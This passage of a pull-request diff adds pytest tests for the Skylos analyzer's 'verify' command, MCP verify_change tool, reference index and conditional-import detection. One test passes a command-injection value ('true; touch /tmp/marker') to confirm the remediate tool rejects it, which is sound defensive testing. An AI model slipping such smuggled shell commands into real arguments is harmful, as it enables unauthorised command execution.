+        encoding="utf-8",
+    )
+
+    findings = scan_dockerfiles(tmp_path)
+
+    assert "SKY-D343" not in _rule_ids(findings)
+
+
 def test_config_scanner_routes_dockerfile(tmp_path: Path):
     dockerfile = tmp_path / "Dockerfile"
     dockerfile.write_text(

--- a/test/test_mcp_summary.py
+++ b/test/test_mcp_summary.py
@@ -1,5 +1,7 @@
 from __future__ import annotations
 
+import json
+
 import skylos_mcp.server as mcp_server
 from skylos_mcp.server import (
     _architecture_payload,
@@ -130,3 +132,44 @@ def test_mcp_remediate_rejects_test_cmd(monkeypatch):
     result = fake.tools["remediate"](".", test_cmd="true; touch /tmp/marker")
 
     assert "does not accept test_cmd" in result
+
+
+def test_mcp_verify_change_returns_shared_schema(monkeypatch):
+    class FakeMCP:
+        def __init__(self):
+            self.tools = {}
+
+        def tool(self):
+            def decorate(fn):
+                self.tools[fn.__name__] = fn
+                return fn
+
+            return decorate
+
+        def resource(self, *_args, **_kwargs):
+            def decorate(fn):
+                return fn
+
+            return decorate
+
+    fake = FakeMCP()
+    _register_tools(fake)
+    monkeypatch.setattr(mcp_server, "_gate", lambda _tool_name: None)
+    monkeypatch.setattr(
+        mcp_server,
+        "_verify_change_impl",
+        lambda **_kwargs: {
+            "schema_version": 1,
+            "tool": "verify_change",
+            "status": "pass",
+            "target": {"path": ".", "file": "app.py", "range": None},
+            "findings": [],
+            "summary": "No AI-code issues found",
+        },
+    )
+
+    result = json.loads(fake.tools["verify_change"](path=".", file="app.py"))
+
+    assert result["schema_version"] == 1
+    assert result["tool"] == "verify_change"
+    assert result["status"] == "pass"

--- a/test/test_reference_index.py
+++ b/test/test_reference_index.py
@@ -1,0 +1,82 @@
+from __future__ import annotations
+
+import hashlib
+
+from skylos.core.reference_index import (
+    INDEX_CACHE_PATH,
+    build_empty_index,
+    build_index_payload,
+    file_signature,
+    validate_index_payload,
+)
+
+
+def test_build_empty_index_has_stable_schema(tmp_path):
+    payload = build_empty_index(tmp_path)
+
+    assert payload["schema_version"] == 1
+    assert payload["index_kind"] == "reference_graph"
+    assert payload["project_root"] == str(tmp_path.resolve())
+    assert payload["files"] == {}
+    assert payload["definitions"] == {}
+    assert payload["references"] == []
+    assert payload["imports"] == {}
+    assert payload["reverse_dependencies"] == {}
+    assert validate_index_payload(payload) is True
+    assert INDEX_CACHE_PATH.as_posix() == ".skylos/index/v1/reference_graph.json"
+
+
+def test_file_signature_uses_relative_path_and_content_hash(tmp_path):
+    source = tmp_path / "src" / "app.py"
+    source.parent.mkdir()
+    content = b"def handler():\n    pass\n"
+    source.write_bytes(content)
+
+    signature = file_signature(tmp_path, source)
+
+    assert signature == {
+        "path": "src/app.py",
+        "sha256": hashlib.sha256(content).hexdigest(),
+        "size": len(content),
+        "mtime_ns": signature["mtime_ns"],
+    }
+    assert isinstance(signature["mtime_ns"], int)
+
+
+def test_file_signature_rejects_symlink(tmp_path):
+    target = tmp_path / "app.py"
+    target.write_text("def handler():\n    pass\n")
+    link = tmp_path / "link.py"
+    link.symlink_to(target)
+
+    assert file_signature(tmp_path, link) is None
+
+
+def test_file_signature_rejects_oversized_file(tmp_path):
+    source = tmp_path / "big.py"
+    source.write_text("abcdef")
+
+    assert file_signature(tmp_path, source, max_bytes=5) is None
+
+
+def test_build_index_payload_normalizes_reverse_dependencies(tmp_path):
+    files = {"app.py": {"path": "app.py", "sha256": "abc", "size": 1, "mtime_ns": 1}}
+    payload = build_index_payload(
+        tmp_path,
+        files=files,
+        definitions={"app.handler": {"file": "app.py", "line": 1}},
+        references=[{"from": "app.main", "to": "app.handler"}],
+        imports={"app.py": ["os"]},
+        reverse_dependencies={"app.py": ["tests/test_app.py", "tests/test_app.py"]},
+    )
+
+    assert validate_index_payload(payload) is True
+    assert payload["files"] == files
+    assert payload["reverse_dependencies"] == {"app.py": ["tests/test_app.py"]}
+
+
+def test_validate_index_payload_rejects_wrong_schema(tmp_path):
+    payload = build_empty_index(tmp_path)
+    payload["schema_version"] = 999
+
+    assert validate_index_payload(payload) is False

--- a/test/test_verify_change.py
+++ b/test/test_verify_change.py
@@ -1,0 +1,182 @@
+from __future__ import annotations
+
+import json
+
+import pytest
+
+from skylos.verify_change import (
+    build_verify_change_response,
+    parse_line_range,
+    verify_change_stdin_payload,
+    verify_change_path,
+)
+
+
+def test_build_verify_change_response_filters_to_ai_findings(tmp_path):
+    app = tmp_path / "app.py"
+    app.write_text("def handler(token):\n    return validate_token(token)\n")
+    result = {
+        "quality": [
+            {
+                "rule_id": "SKY-L012",
+                "vibe_category": "hallucinated_reference",
+                "ai_likelihood": "high",
+                "severity": "CRITICAL",
+                "file": str(app),
+                "line": 2,
+                "col": 11,
+                "message": "Call to validate_token() is never defined.",
+            },
+            {
+                "rule_id": "SKY-Q302",
+                "severity": "LOW",
+                "file": str(app),
+                "line": 1,
+                "message": "Generic quality finding",
+            },
+        ],
+    }
+
+    payload = build_verify_change_response(result, project_root=tmp_path)
+
+    assert payload["schema_version"] == 1
+    assert payload["tool"] == "verify_change"
+    assert payload["status"] == "fail"
+    assert payload["summary"] == "1 AI-code issue found"
+    assert len(payload["findings"]) == 1
+    finding = payload["findings"][0]
+    assert finding["rule_id"] == "SKY-L012"
+    assert finding["vibe_category"] == "hallucinated_reference"
+    assert finding["ai_likelihood"] == "high"
+    assert finding["confidence"] == 90
+    assert finding["range"]["file"] == "app.py"
+    assert finding["range"]["start_line"] == 2
+    assert finding["suggested_fix"]
+
+
+def test_build_verify_change_response_applies_rule_defaults(tmp_path):
+    app = tmp_path / "app.py"
+    app.write_text("requests.get(url, verify=False)\n")
+    result = {
+        "quality": [
+            {
+                "rule_id": "SKY-L011",
+                "severity": "HIGH",
+                "file": str(app),
+                "line": 1,
+                "message": "TLS verification disabled.",
+            }
+        ]
+    }
+
+    payload = build_verify_change_response(result, project_root=tmp_path)
+
+    finding = payload["findings"][0]
+    assert finding["vibe_category"] == "disabled_security_control"
+    assert finding["ai_likelihood"] == "medium"
+    assert finding["confidence"] == 70
+
+
+def test_build_verify_change_response_filters_target_file_and_range(tmp_path):
+    app = tmp_path / "app.py"
+    other = tmp_path / "other.py"
+    app.write_text("def a():\n    return validate_token(token)\n")
+    other.write_text("def b():\n    return require_admin(user)\n")
+    result = {
+        "quality": [
+            {
+                "rule_id": "SKY-L012",
+                "vibe_category": "hallucinated_reference",
+                "ai_likelihood": "high",
+                "file": str(app),
+                "line": 2,
+                "message": "app phantom",
+            },
+            {
+                "rule_id": "SKY-L012",
+                "vibe_category": "hallucinated_reference",
+                "ai_likelihood": "high",
+                "file": str(other),
+                "line": 2,
+                "message": "other phantom",
+            },
+        ]
+    }
+
+    payload = build_verify_change_response(
+        result,
+        project_root=tmp_path,
+        target_file="app.py",
+        line_range="2:2",
+    )
+
+    assert [f["message"] for f in payload["findings"]] == ["app phantom"]
+    assert payload["target"]["file"] == "app.py"
+    assert payload["target"]["range"] == {"start_line": 2, "end_line": 2}
+
+
+def test_parse_line_range_validation():
+    assert parse_line_range("4:9") == (4, 9)
+    assert parse_line_range("4-9") == (4, 9)
+    assert parse_line_range("4") == (4, 4)
+    with pytest.raises(ValueError):
+        parse_line_range("9:4")
+
+
+def test_verify_change_path_runs_existing_vibe_rules(tmp_path):
+    app = tmp_path / "app.py"
+    app.write_text("def handler(token):\n    return validate_token(token)\n")
+
+    payload = verify_change_path(app, line_range="2:2")
+
+    assert payload["status"] == "fail"
+    assert any(f["rule_id"] == "SKY-L012" for f in payload["findings"])
+    assert all(f["range"]["start_line"] == 2 for f in payload["findings"])
+
+
+def test_verify_change_path_accepts_injected_analyzer_result(tmp_path):
+    app = tmp_path / "app.py"
+    app.write_text("def handler():\n    pass\n")
+
+    def fake_analyze(*_args, **_kwargs):
+        return json.dumps(
+            {
+                "quality": [
+                    {
+                        "rule_id": "SKY-L026",
+                        "vibe_category": "incomplete_generation",
+                        "ai_likelihood": "medium",
+                        "file": str(app),
+                        "line": 2,
+                        "message": "Generated stub left behind.",
+                    }
+                ]
+            }
+        )
+
+    payload = verify_change_path(app, analyze_func=fake_analyze)
+
+    assert payload["status"] == "fail"
+    assert payload["findings"][0]["vibe_category"] == "incomplete_generation"
+
+
+def test_verify_change_stdin_payload_uses_manifest_file_for_schema():
+    payload = verify_change_stdin_payload(
+        {
+            "path": "/repo",
+            "file": "src/app.py",
+            "range": "2:2",
+            "code": "def handler(token):\n    return validate_token(token)\n",
+        }
+    )
+
+    assert payload["status"] == "fail"
+    assert payload["target"]["path"] == "/repo"
+    assert payload["target"]["file"] == "src/app.py"
+    assert payload["target"]["range"] == {"start_line": 2, "end_line": 2}
+    assert any(f["range"]["file"] == "src/app.py" for f in payload["findings"])
+
+
+def test_verify_change_stdin_payload_rejects_absolute_manifest_file():
+    with pytest.raises(ValueError):
+        verify_change_stdin_payload({"file": "/tmp/app.py", "code": "pass\n"})

--- a/test/test_verify_cmd.py
+++ b/test/test_verify_cmd.py
@@ -1,0 +1,126 @@
+from __future__ import annotations
+
+import io
+import json
+import sys
+
+from skylos.commands.verify_cmd import run_verify_command
+
+
+def test_run_verify_command_prints_json_and_preserves_args(capsys):
+    seen = {}
+
+    def fake_verify(path, **kwargs):
+        seen["path"] = path
+        seen["kwargs"] = kwargs
+        return {
+            "schema_version": 1,
+            "tool": "verify_change",
+            "status": "pass",
+            "target": {"path": path, "file": "app.py", "range": None},
+            "findings": [],
+            "summary": "No AI-code issues found",
+        }
+
+    exit_code = run_verify_command(
+        [
+            "repo",
+            "--file",
+            "app.py",
+            "--range",
+            "2:5",
+            "--project-context",
+            "--dependency-hallucinations",
+            "--exclude-folder",
+            "build",
+            "-c",
+            "75",
+        ],
+        verify_change_path_func=fake_verify,
+        parse_exclude_folders_func=lambda **_kwargs: ("venv",),
+    )
+
+    payload = json.loads(capsys.readouterr().out)
+    assert exit_code == 0
+    assert payload["tool"] == "verify_change"
+    assert seen["path"] == "repo"
+    assert seen["kwargs"] == {
+        "file": "app.py",
+        "line_range": "2:5",
+        "confidence": 75,
+        "exclude_folders": ["venv", "build"],
+        "project_context": True,
+        "include_dependency_hallucinations": True,
+    }
+
+
+def test_run_verify_command_fails_on_findings_unless_disabled(capsys):
+    def fake_verify(_path, **_kwargs):
+        return {
+            "schema_version": 1,
+            "tool": "verify_change",
+            "status": "fail",
+            "target": {"path": ".", "file": None, "range": None},
+            "findings": [{"rule_id": "SKY-L012"}],
+            "summary": "1 AI-code issue found",
+        }
+
+    fail_code = run_verify_command(
+        ["."],
+        verify_change_path_func=fake_verify,
+        parse_exclude_folders_func=lambda **_kwargs: (),
+    )
+    _ = capsys.readouterr()
+
+    no_fail_code = run_verify_command(
+        [".", "--no-fail"],
+        verify_change_path_func=fake_verify,
+        parse_exclude_folders_func=lambda **_kwargs: (),
+    )
+    _ = capsys.readouterr()
+
+    assert fail_code == 1
+    assert no_fail_code == 0
+
+
+def test_run_verify_command_reads_stdin_manifest(monkeypatch, capsys):
+    seen = {}
+
+    def fake_stdin(payload, **kwargs):
+        seen["payload"] = payload
+        seen["kwargs"] = kwargs
+        return {
+            "schema_version": 1,
+            "tool": "verify_change",
+            "status": "pass",
+            "target": {"path": payload["path"], "file": payload["file"], "range": None},
+            "findings": [],
+            "summary": "No AI-code issues found",
+        }
+
+    monkeypatch.setattr(
+        sys,
+        "stdin",
+        io.StringIO(json.dumps({"code": "def handler():\n    pass\n"})),
+    )
+
+    exit_code = run_verify_command(
+        ["repo", "--stdin", "--file", "app.py", "--range", "2:2", "-c", "80"],
+        verify_change_path_func=lambda *_args, **_kwargs: None,
+        verify_change_stdin_payload_func=fake_stdin,
+        parse_exclude_folders_func=lambda **_kwargs: ("venv",),
+    )
+
+    payload = json.loads(capsys.readouterr().out)
+    assert exit_code == 0
+    assert payload["tool"] == "verify_change"
+    assert seen["payload"] == {
+        "code": "def handler():\n    pass\n",
+        "path": "repo",
+        "file": "app.py",
+        "range": "2:2",
+    }
+    assert seen["kwargs"] == {
+        "confidence": 80,
+        "exclude_folders": ["venv"],
+    }

--- a/test/test_visitor.py
+++ b/test/test_visitor.py
@@ -145,6 +145,32 @@ except ImportError:
         self.assertTrue(imports[0].conditional_import)
         self.assertTrue(imports[0].to_dict()["conditional_import"])
 
+    def test_try_except_tuple_import_marks_conditional_import(self):
+        code = """
+try:
+    import brotli
+except (ImportError, ModuleNotFoundError):
+    brotli = None
+"""
+        visitor = self.parse_and_visit(code)
+
+        imports = [d for d in visitor.defs if d.type == "import"]
+        self.assertEqual(len(imports), 1)
+        self.assertTrue(imports[0].conditional_import)
+
+    def test_try_star_import_marks_conditional_import(self):
+        code = """
+try:
+    import brotli
+except* ImportError:
+    brotli = None
+"""
+        visitor = self.parse_and_visit(code)
+
+        imports = [d for d in visitor.defs if d.type == "import"]
+        self.assertEqual(len(imports), 1)
+        self.assertTrue(imports[0].conditional_import)
+
     def test_class_with_methods(self):
         code = """
 class MyClass:


### PR DESCRIPTION
## Summary

  - Add `skylos verify` for narrow AI-code defect verification on a path, file, or line range.
  - Add `--stdin` manifest support for agent-generated code blobs.
  - Add MCP `verify_change` so coding agents can call the same verifier path.
  - Add a versioned `verify_change` JSON schema with normalized AI-defect findings.
  - Add the initial persistent reference index schema and file signature model.
  - Keep verifier code split into focused modules with explicit control flow.

  ## Tests

  - `pytest test/test_reference_index.py test/test_verify_change.py test/test_verify_cmd.py test/
  test_mcp_summary.py test/test_mcp_security.py test/test_cli_refactor_guardrails.py`